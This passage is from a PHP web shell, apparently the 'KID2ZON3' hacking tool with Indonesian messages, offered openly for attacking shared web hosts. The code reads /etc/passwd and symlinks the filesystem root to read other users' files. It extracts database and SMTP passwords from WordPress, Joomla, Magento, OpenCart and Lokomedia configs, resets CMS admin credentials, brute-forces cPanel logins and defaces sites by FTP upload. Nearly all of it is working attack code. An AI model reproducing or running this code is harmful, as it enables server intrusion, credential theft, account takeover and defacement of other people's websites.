1414. <table align=center border=1>
1415. <tr>
1416. <td align=center><font size=3>No.</font></td>
1417. <td align=center><font size=3>Users</font></td>
1418. <td align=center><font size=3>Symlink</font></td>
1419. </tr>";
1420. $dcount = 1;
1421. $file = fopen("/etc/passwd", "r") or exit("Unable to open file!");
1422. while(!feof($file)){
1423. $s = fgets($file);
1424. $matches = array();
1425. $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
1426. $matches = str_replace("home/","",$matches[1]);
1427. if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
1428. continue;
1429. echo "<tr><td align=center><font size=2>" . $dcount . "</td>
1430. <td align=center><font class=txt>" . $matches . "</td>";
1431. echo "<td align=center><font class=txt><a href=$full/gans_sym/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
1432. $dcount++;}fclose($file);
1433. echo "</table>";}else{if($os != "Windows"){@mkdir("gans_sym",0777);@chdir("gans_sym");@exe("ln -s / root");$file3 = '
1434. Options Indexes FollowSymLinks
1435. DirectoryIndex hgt.html
1436. AddType text/plain .php
1437. AddHandler text/plain .php
1438. Satisfy Any
1439. ';
1440. $fp3 = fopen('.htaccess','w');
1441. $fw3 = fwrite($fp3,$file3);@fclose($fp3);
1442. echo "
1443. <div class='mybox'>
1444. <h2 class='k2ll33d2'>Server Symlinker</h2>
1445. <table align=center border=1>
1446. <tr>
1447. <td align=center><font size=3>ID</font></td>
1448. <td align=center><font size=3>Users</font></td>
1449. <td align=center><font size=3>Symlink</font></td>
1450. </tr>";
1451. $temp = "";$val1 = 0;$val2 = 1000;
1452. for(;$val1 <= $val2;$val1++) {$uid = @posix_getpwuid($val1);
1453. if ($uid)$temp .= join(':',$uid)."\n";}
1454. echo '<br/>';$temp = trim($temp);$file5 =
1455. fopen("test.txt","w");
1456. fputs($file5,$temp);
1457. fclose($file5);$dcount = 1;$file =
1458. fopen("test.txt", "r") or exit("Unable to open file!");
1459. while(!feof($file)){$s = fgets($file);$matches = array();
1460. $t = preg_match('/\/(.*?)\:\//s', $s, $matches);$matches = str_replace("home/","",$matches[1]);
1461. if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
1462. continue;
1463. echo "<tr><td align=center><font size=2>" . $dcount . "</td>
1464. <td align=center><font class=txt>" . $matches . "</td>";
1465. echo "<td align=center><font class=txt><a href=$full/gans_sym/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
1466. $dcount++;}
1467. fclose($file);
1468. echo "</table></div></center>";unlink("test.txt");
1469. } else
1470. echo "<center><font size=3>Cannot create Symlink</font></center>";
1471. }
1472. }
1473. } elseif($_GET['do'] == 'jumping') {
1474. $i = 0;
1475. echo "<div class='margin: 5px auto;'>";
1476. if(preg_match("/hsphere/", $dir)) {
1477. $urls = explode("\r\n", $_POST['url']);
1478. if(isset($_POST['jump'])) {
1479. echo "<pre>";
1480. foreach($urls as $url) {
1481. $url = str_replace(array("http://","www."), "", strtolower($url));
1482. $etc = "/etc/passwd";
1483. $f = fopen($etc,"r");
1484. while($gets = fgets($f)) {
1485. $pecah = explode(":", $gets);
1486. $user = $pecah[0];
1487. $dir_user = "/hsphere/local/home/$user";
1488. if(is_dir($dir_user) === true) {
1489. $url_user = $dir_user."/".$url;
1490. if(is_readable($url_user)) {
1491. $i++;
1492. $jrw = "[<font color=lime>R</font>] <a href='?dir=$url_user'><font color=gold>$url_user</font></a>";
1493. if(is_writable($url_user)) {
1494. $jrw = "[<font color=lime>RW</font>] <a href='?dir=$url_user'><font color=gold>$url_user</font></a>";
1495. }
1496. echo $jrw."<br>";
1497. }
1498. }
1499. }
1500. }
1501. if($i == 0) {
1502. } else {
1503. echo "<br>Total ada ".$i." Kamar di ".$ip;
1504. }
1505. echo "</pre>";
1506. } else {
1507. echo '<center>
1508. <form method="post">
1509. List Domains: <br>
1510. <textarea name="url" style="width: 500px; height: 250px;">';
1511. $fp = fopen("/hsphere/local/config/httpd/sites/sites.txt","r");
1512. while($getss = fgets($fp)) {
1513. echo $getss;
1514. }
1515. echo '</textarea><br>
1516. <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
1517. </form></center>';
1518. }
1519. } elseif(preg_match("/vhosts|vhost/", $dir)) {
1520. preg_match("/\/var\/www\/(.*?)\//", $dir, $vh);
1521. $urls = explode("\r\n", $_POST['url']);
1522. if(isset($_POST['jump'])) {
1523. echo "<pre>";
1524. foreach($urls as $url) {
1525. $url = str_replace("www.", "", $url);
1526. $web_vh = "/var/www/".$vh[1]."/$url/httpdocs";
1527. if(is_dir($web_vh) === true) {
1528. if(is_readable($web_vh)) {
1529. $i++;
1530. $jrw = "[<font color=lime>R</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>";
1531. if(is_writable($web_vh)) {
1532. $jrw = "[<font color=lime>RW</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>";
1533. }
1534. echo $jrw."<br>";
1535. }
1536. }
1537. }
1538. if($i == 0) {
1539. } else {
1540. echo "<br>Total ada ".$i." Kamar di ".$ip;
1541. }
1542. echo "</pre>";
1543. } else {
1544. echo '<center>
1545. <form method="post">
1546. List Domains: <br>
1547. <textarea name="url" style="width: 500px; height: 250px;">';
1548. bing("ip:$ip");
1549. echo '</textarea><br>
1550. <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
1551. </form></center>';
1552. }
1553. } else {
1554. echo "<pre>";
1555. $etc = fopen("/etc/passwd", "r") or die("<font color=red>Can't read /etc/passwd</font>");
1556. while($passwd = fgets($etc)) {
1557. if($passwd == '' || !$etc) {
1558. echo "<font color=red>Can't read /etc/passwd</font>";
1559. } else {
1560. preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
1561. foreach($user_jumping[1] as $user_hgt_jump) {
1562. $user_jumping_dir = "/home/$user_hgt_jump/public_html";
1563. if(is_readable($user_jumping_dir)) {
1564. $i++;
1565. $jrw = "[<font color=lime>R</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
1566. if(is_writable($user_jumping_dir)) {
1567. $jrw = "[<font color=lime>RW</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
1568. }
1569. echo $jrw;
1570. if(function_exists('posix_getpwuid')) {
1571. $domain_jump = file_get_contents("/etc/named.conf");
1572. if($domain_jump == '') {
1573. echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
1574. } else {
1575. preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
1576. foreach($domains_jump[1] as $dj) {
1577. $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
1578. $user_jumping_url = $user_jumping_url['name'];
1579. if($user_jumping_url == $user_hgt_jump) {
1580. echo " => ( <u>$dj</u> )<br>";
1581. break;
1582. }
1583. }
1584. }
1585. } else {
1586. echo "<br>";
1587. }
1588. }
1589. }
1590. }
1591. }
1592. if($i == 0) {
1593. } else {
1594. echo "<br>Total ada ".$i." Kamar di ".$ip;
1595. }
1596. echo "</pre>";
1597. }
1598. echo "</div>";
1599. } elseif($_GET['do'] == 'auto_edit_user') {
1600. if($_POST['hajar']) {
1601. if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {
1602. echo "username atau password harus lebih dari 6 karakter";
1603. } else {
1604. $user_baru = $_POST['user_baru'];
1605. $pass_baru = md5($_POST['pass_baru']);
1606. $conf = $_POST['config_dir'];
1607. $scan_conf = scandir($conf);
1608. foreach($scan_conf as $file_conf) {
1609. if(!is_file("$conf/$file_conf")) continue;
1610. $config = file_get_contents("$conf/$file_conf");
1611. if(preg_match("/JConfig|joomla/",$config)) {
1612. $dbhost = ambilkata($config,"host = '","'");
1613. $dbuser = ambilkata($config,"user = '","'");
1614. $dbpass = ambilkata($config,"password = '","'");
1615. $dbname = ambilkata($config,"db = '","'");
1616. $dbprefix = ambilkata($config,"dbprefix = '","'");
1617. $prefix = $dbprefix."users";
1618. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1619. $db = mysql_select_db($dbname);
1620. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
1621. $result = mysql_fetch_array($q);
1622. $id = $result['id'];
1623. $site = ambilkata($config,"sitename = '","'");
1624. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
1625. echo "Config => ".$file_conf."<br>";
1626. echo "CMS => Joomla<br>";
1627. if($site == '') {
1628. echo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>";
1629. } else {
1630. echo "Sitename => $site<br>";
1631. }
1632. if(!$update OR !$conn OR !$db) {
1633. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
1634. } else {
1635. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
1636. }
1637. mysql_close($conn);
1638. } elseif(preg_match("/WordPress/",$config)) {
1639. $dbhost = ambilkata($config,"DB_HOST', '","'");
1640. $dbuser = ambilkata($config,"DB_USER', '","'");
1641. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
1642. $dbname = ambilkata($config,"DB_NAME', '","'");
1643. $dbprefix = ambilkata($config,"table_prefix = '","'");
1644. $prefix = $dbprefix."users";
1645. $option = $dbprefix."options";
1646. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1647. $db = mysql_select_db($dbname);
1648. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
1649. $result = mysql_fetch_array($q);
1650. $id = $result[ID];
1651. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
1652. $result2 = mysql_fetch_array($q2);
1653. $target = $result2[option_value];
1654. if($target == '') {
1655. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
1656. } else {
1657. $url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
1658. }
1659. $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
1660. echo "Config => ".$file_conf."<br>";
1661. echo "CMS => Wordpress<br>";
1662. echo $url_target;
1663. if(!$update OR !$conn OR !$db) {
1664. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
1665. } else {
1666. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
1667. }
1668. mysql_close($conn);
1669. } elseif(preg_match("/Magento|Mage_Core/",$config)) {
1670. $dbhost = ambilkata($config,"<host><![CDATA[","]]></host>");
1671. $dbuser = ambilkata($config,"<username><![CDATA[","]]></username>");
1672. $dbpass = ambilkata($config,"<password><![CDATA[","]]></password>");
1673. $dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>");
1674. $dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>");
1675. $prefix = $dbprefix."admin_user";
1676. $option = $dbprefix."core_config_data";
1677. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1678. $db = mysql_select_db($dbname);
1679. $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
1680. $result = mysql_fetch_array($q);
1681. $id = $result[user_id];
1682. $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
1683. $result2 = mysql_fetch_array($q2);
1684. $target = $result2[value];
1685. if($target == '') {
1686. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
1687. } else {
1688. $url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
1689. }
1690. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
1691. echo "Config => ".$file_conf."<br>";
1692. echo "CMS => Magento<br>";
1693. echo $url_target;
1694. if(!$update OR !$conn OR !$db) {
1695. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
1696. } else {
1697. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
1698. }
1699. mysql_close($conn);
1700. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
1701. $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'");
1702. $dbuser = ambilkata($config,"'DB_USERNAME', '","'");
1703. $dbpass = ambilkata($config,"'DB_PASSWORD', '","'");
1704. $dbname = ambilkata($config,"'DB_DATABASE', '","'");
1705. $dbprefix = ambilkata($config,"'DB_PREFIX', '","'");
1706. $prefix = $dbprefix."user";
1707. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1708. $db = mysql_select_db($dbname);
1709. $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
1710. $result = mysql_fetch_array($q);
1711. $id = $result[user_id];
1712. $target = ambilkata($config,"HTTP_SERVER', '","'");
1713. if($target == '') {
1714. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
1715. } else {
1716. $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
1717. }
1718. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
1719. echo "Config => ".$file_conf."<br>";
1720. echo "CMS => OpenCart<br>";
1721. echo $url_target;
1722. if(!$update OR !$conn OR !$db) {
1723. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
1724. } else {
1725. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
1726. }
1727. mysql_close($conn);
1728. } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
1729. $dbhost = ambilkata($config,'server = "','"');
1730. $dbuser = ambilkata($config,'username = "','"');
1731. $dbpass = ambilkata($config,'password = "','"');
1732. $dbname = ambilkata($config,'database = "','"');
1733. $prefix = "users";
1734. $option = "identitas";
1735. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1736. $db = mysql_select_db($dbname);
1737. $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
1738. $result = mysql_fetch_array($q);
1739. $target = $result[alamat_website];
1740. if($target == '') {
1741. $target2 = $result[url];
1742. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
1743. if($target2 == '') {
1744. $url_target2 = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
1745. } else {
1746. $cek_login3 = file_get_contents("$target2/adminweb/");
1747. $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
1748. if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
1749. $url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
1750. } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
1751. $url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
1752. } else {
1753. $url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
1754. }
1755. }
1756. } else {
1757. $cek_login = file_get_contents("$target/adminweb/");
1758. $cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
1759. if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
1760. $url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
1761. } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
1762. $url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
1763. } else {
1764. $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
1765. }
1766. }
1767. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'");
1768. echo "Config => ".$file_conf."<br>";
1769. echo "CMS => Lokomedia<br>";
1770. if(preg_match('/error, gabisa ambil nama domain nya/', $url_target)) {
1771. echo $url_target2;
1772. } else {
1773. echo $url_target;
1774. }
1775. if(!$update OR !$conn OR !$db) {
1776. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
1777. } else {
1778. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
1779. }
1780. mysql_close($conn);
1781. }
1782. }
1783. }
1784. } else {
1785. echo "<center>
1786. <h1>Auto Edit User Config</h1>
1787. <form method='post'>
1788. DIR Config: <br>
1789. <input type='text' size='50' name='config_dir' value='$dir'><br><br>
1790. Set User & Pass: <br>
1791. <input type='text' name='user_baru' value='KID2ZON3' placeholder='user_baru'><br>
1792. <input type='text' name='pass_baru' value='KID2ZON3' placeholder='pass_baru'><br>
1793. <input type='submit' name='hajar' value='Hajar!' style='width: 215px;'>
1794. </form>
1795. <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
1796. ";
1797. }
1798. } elseif($_GET['do'] == 'cpanel') {
1799. if($_POST['crack']) {
1800. $usercp = explode("\r\n", $_POST['user_cp']);
1801. $passcp = explode("\r\n", $_POST['pass_cp']);
1802. $i = 0;
1803. foreach($usercp as $ucp) {
1804. foreach($passcp as $pcp) {
1805. if(@mysql_connect('localhost', $ucp, $pcp)) {
1806. if($_SESSION[$ucp] && $_SESSION[$pcp]) {
1807. } else {
1808. $_SESSION[$ucp] = "1";
1809. $_SESSION[$pcp] = "1";
1810. if($ucp == '' || $pcp == '') {
1811.  
1812. } else {
1813. $i++;
1814. if(function_exists('posix_getpwuid')) {
1815. $domain_cp = file_get_contents("/etc/named.conf");
1816. if($domain_cp == '') {
1817. $dom = "<font color=red>gabisa ambil nama domain nya</font>";
1818. } else {
1819. preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
1820. foreach($domains_cp[1] as $dj) {
1821. $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
1822. $user_cp_url = $user_cp_url['name'];
1823. if($user_cp_url == $ucp) {
1824. $dom = "<a href='http://$dj/' target='_blank'><font color=lime>$dj</font></a>";
1825. break;
1826. }
1827. }
1828. }
1829. } else {
1830. $dom = "<font color=red>function is Disable by system</font>";
1831. }
1832. echo "username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>) domain ($dom)<br>";
1833. }
1834. }
1835. }
1836. }
1837. }
1838. if($i == 0) {
1839. } else {
1840. echo "<br>sukses nyolong ".$i." Cpanel by <font color=lime>KID2ZON3.</font>";
1841. }
1842. } else {
1843. echo "<center>
1844. <form method='post'>
1845. USER: <br>
1846. <textarea style='width: 450px; height: 150px;' name='user_cp'>";
1847. $_usercp = fopen("/etc/passwd","r");
1848. while($getu = fgets($_usercp)) {
1849. if($getu == '' || !$_usercp) {
1850. echo "<font color=red>Can't read /etc/passwd</font>";
1851. } else {
1852. preg_match_all("/(.*?):x:/", $getu, $u);
1853. foreach($u[1] as $user_cp) {
1854. if(is_dir("/home/$user_cp/public_html")) {
1855. echo "$user_cp\n";
1856. }
1857. }
1858. }
1859. }
1860. echo "</textarea><br>
1861. PASS: <br>
1862. <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
1863. function cp_pass($dir) {
1864. $pass = "";
1865. $dira = scandir($dir);
1866. foreach($dira as $dirb) {
1867. if(!is_file("$dir/$dirb")) continue;
1868. $ambil = file_get_contents("$dir/$dirb");
1869. if(preg_match("/WordPress/", $ambil)) {
1870. $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
1871. } elseif(preg_match("/JConfig|joomla/", $ambil)) {
1872. $pass .= ambilkata($ambil,"password = '","'")."\n";
1873. } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
1874. $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
1875. } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
1876. $pass .= ambilkata($ambil,'password = "','"')."\n";
1877. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
1878. $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
1879. } elseif(preg_match("/^[client]$/", $ambil)) {
1880. preg_match("/password=(.*?)/", $ambil, $pass1);
1881. if(preg_match('/"/', $pass1[1])) {
1882. $pass1[1] = str_replace('"', "", $pass1[1]);
1883. $pass .= $pass1[1]."\n";
1884. } else {
1885. $pass .= $pass1[1]."\n";
1886. }
1887. } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
1888. $pass .= ambilkata($ambil,"db_password = '","'")."\n";
1889. }
1890. }
1891. echo $pass;
1892. }
1893. $cp_pass = cp_pass($dir);
1894. echo $cp_pass;
1895. echo "</textarea><br>
1896. <input type='submit' name='crack' style='width: 450px;' value='Crack'>
1897. </form>
1898. <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
1899. }
1900. } elseif($_GET['do'] == 'cpftp_auto') {
1901. if($_POST['crack']) {
1902. $usercp = explode("\r\n", $_POST['user_cp']);
1903. $passcp = explode("\r\n", $_POST['pass_cp']);
1904. $i = 0;
1905. foreach($usercp as $ucp) {
1906. foreach($passcp as $pcp) {
1907. if(@mysql_connect('localhost', $ucp, $pcp)) {
1908. if($_SESSION[$ucp] && $_SESSION[$pcp]) {
1909. } else {
1910. $_SESSION[$ucp] = "1";
1911. $_SESSION[$pcp] = "1";
1912. if($ucp == '' || $pcp == '') {
1913. //
1914. } else {
1915. echo "[+] username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>";
1916. $ftp_conn = ftp_connect($ip);
1917. $ftp_login = ftp_login($ftp_conn, $ucp, $pcp);
1918. if((!$ftp_login) || (!$ftp_conn)) {
1919. echo "[+] <font color=red>Login Gagal</font><br><br>";
1920. } else {
1921. echo "[+] <font color=lime>Login Sukses</font><br>";
1922. $fi = htmlspecialchars($_POST['file_deface']);
1923. $deface = ftp_put($ftp_conn, "public_html/$fi", $_POST['deface'], FTP_BINARY);
1924. if($deface) {
1925. $i++;
1926. echo "[+] <font color=lime>Deface Sukses</font><br>";
1927. if(function_exists('posix_getpwuid')) {
1928. $domain_cp = file_get_contents("/etc/named.conf");
1929. if($domain_cp == '') {
1930. echo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>";
1931. } else {
1932. preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
1933. foreach($domains_cp[1] as $dj) {
1934. $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
1935. $user_cp_url = $user_cp_url['name'];
1936. if($user_cp_url == $ucp) {
1937. echo "[+] <a href='http://$dj/$fi' target='_blank'>http://$dj/$fi</a><br><br>";
1938. break;
1939. }
1940. }
1941. }
1942. } else {
1943. echo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>";
1944. }
1945. } else {
1946. echo "[-] <font color=red>Deface Gagal</font><br><br>";
1947. }
1948. }
1949. //echo "username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>";
1950. }
1951. }
1952. }
1953. }
1954. }
1955. if($i == 0) {
1956. } else {
1957. echo "<br>sukses deface ".$i." Cpanel by <font color=lime>KID2ZON3.</font>";
1958. }
1959. } else {
1960. echo "<center>
1961. <form method='post'>
1962. Filename: <br>
1963. <input type='text' name='file_deface' placeholder='index.php' value='index.php' style='width: 450px;'><br>
1964. Deface Page: <br>
1965. <input type='text' name='deface' placeholder='http://www.web-yang-udah-di-deface.com/filemu.php' style='width: 450px;'><br>
1966. USER: <br>
1967. <textarea style='width: 450px; height: 150px;' name='user_cp'>";
1968. $_usercp = fopen("/etc/passwd","r");
1969. while($getu = fgets($_usercp)) {
1970. if($getu == '' || !$_usercp) {
1971. echo "<font color=red>Can't read /etc/passwd</font>";
1972. } else {
1973. preg_match_all("/(.*?):x:/", $getu, $u);
1974. foreach($u[1] as $user_cp) {
1975. if(is_dir("/home/$user_cp/public_html")) {
1976. echo "$user_cp\n";
1977. }
1978. }
1979. }
1980. }
1981. echo "</textarea><br>
1982. PASS: <br>
1983. <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
1984. function cp_pass($dir) {
1985. $pass = "";
1986. $dira = scandir($dir);
1987. foreach($dira as $dirb) {
1988. if(!is_file("$dir/$dirb")) continue;
1989. $ambil = file_get_contents("$dir/$dirb");
1990. if(preg_match("/WordPress/", $ambil)) {
1991. $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
1992. } elseif(preg_match("/JConfig|joomla/", $ambil)) {
1993. $pass .= ambilkata($ambil,"password = '","'")."\n";
1994. } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
1995. $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
1996. } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
1997. $pass .= ambilkata($ambil,'password = "','"')."\n";
1998. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
1999. $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
2000. } elseif(preg_match("/client/", $ambil)) {
2001. preg_match("/password=(.*)/", $ambil, $pass1);
2002. if(preg_match('/"/', $pass1[1])) {
2003. $pass1[1] = str_replace('"', "", $pass1[1]);
2004. $pass .= $pass1[1]."\n";
2005. }
2006. } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
2007. $pass .= ambilkata($ambil,"db_password = '","'")."\n";
2008. }
2009. }
2010. echo $pass;
2011. }
2012. $cp_pass = cp_pass($dir);
2013. echo $cp_pass;
2014. echo "</textarea><br>
2015. <input type='submit' name='crack' style='width: 450px;' value='Hajar'>
2016. </form>
2017. <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
2018. }
2019. } elseif($_GET['do'] == 'smtp') {
2020. echo "<center><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span></center><br>";
2021. function scj($dir) {
2022. $dira = scandir($dir);
2023. foreach($dira as $dirb) {
2024. if(!is_file("$dir/$dirb")) continue;
2025. $ambil = file_get_contents("$dir/$dirb");
2026. $ambil = str_replace("$", "", $ambil);
2027. if(preg_match("/JConfig|joomla/", $ambil)) {
2028. $smtp_host = ambilkata($ambil,"smtphost = '","'");
2029. $smtp_auth = ambilkata($ambil,"smtpauth = '","'");
2030. $smtp_user = ambilkata($ambil,"smtpuser = '","'");
2031. $smtp_pass = ambilkata($ambil,"smtppass = '","'");
2032. $smtp_port = ambilkata($ambil,"smtpport = '","'");
2033. $smtp_secure = ambilkata($ambil,"smtpsecure = '","'");
2034. echo "SMTP Host: <font color=lime>$smtp_host</font><br>";
2035. echo "SMTP port: <font color=lime>$smtp_port</font><br>";
2036. echo "SMTP user: <font color=lime>$smtp_user</font><br>";
2037. echo "SMTP pass: <font color=lime>$smtp_pass</font><br>";
2038. echo "SMTP auth: <font color=lime>$smtp_auth</font><br>";
2039. echo "SMTP secure: <font color=lime>$smtp_secure</font><br><br>";
2040. }
2041. }
2042. }
2043. $smpt_hunter = scj($dir);
2044. echo $smpt_hunter;
2045. } elseif($_GET['do'] == 'auto_wp') {
2046. if($_POST['hajar']) {
2047. $title = htmlspecialchars($_POST['new_title']);
2048. $pn_title = str_replace(" ", "-", $title);
2049. if($_POST['cek_edit'] == "Y") {
2050. $script = $_POST['edit_content'];
2051. } else {
2052. $script = $title;
2053. }
2054. $conf = $_POST['config_dir'];
2055. $scan_conf = scandir($conf);
2056. foreach($scan_conf as $file_conf) {
2057. if(!is_file("$conf/$file_conf")) continue;
2058. $config = file_get_contents("$conf/$file_conf");
2059. if(preg_match("/WordPress/", $config)) {
2060. $dbhost = ambilkata($config,"DB_HOST', '","'");
2061. $dbuser = ambilkata($config,"DB_USER', '","'");
2062. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
2063. $dbname = ambilkata($config,"DB_NAME', '","'");
2064. $dbprefix = ambilkata($config,"table_prefix = '","'");
2065. $prefix = $dbprefix."posts";
2066. $option = $dbprefix."options";
2067. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
2068. $db = mysql_select_db($dbname);
2069. $q = mysql_query("SELECT * FROM $prefix ORDER BY ID ASC");
2070. $result = mysql_fetch_array($q);
2071. $id = $result[ID];
2072. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
2073. $result2 = mysql_fetch_array($q2);
2074. $target = $result2[option_value];
2075. $update = mysql_query("UPDATE $prefix SET post_title='$title',post_content='$script',post_name='$pn_title',post_status='publish',comment_status='open',ping_status='open',post_type='post',comment_count='1' WHERE id='$id'");
2076. $update .= mysql_query("UPDATE $option SET option_value='$title' WHERE option_name='blogname' OR option_name='blogdescription'");
2077. echo "<div style='margin: 5px auto;'>";
2078. if($target == '') {
2079. echo "URL: <font color=red>error, gabisa ambil nama domain nya</font> -> ";
2080. } else {
2081. echo "URL: <a href='$target/?p=$id' target='_blank'>$target/?p=$id</a> -> ";
2082. }
2083. if(!$update OR !$conn OR !$db) {
2084. echo "<font color=red>MySQL Error: ".mysql_error()."</font><br>";
2085. } else {
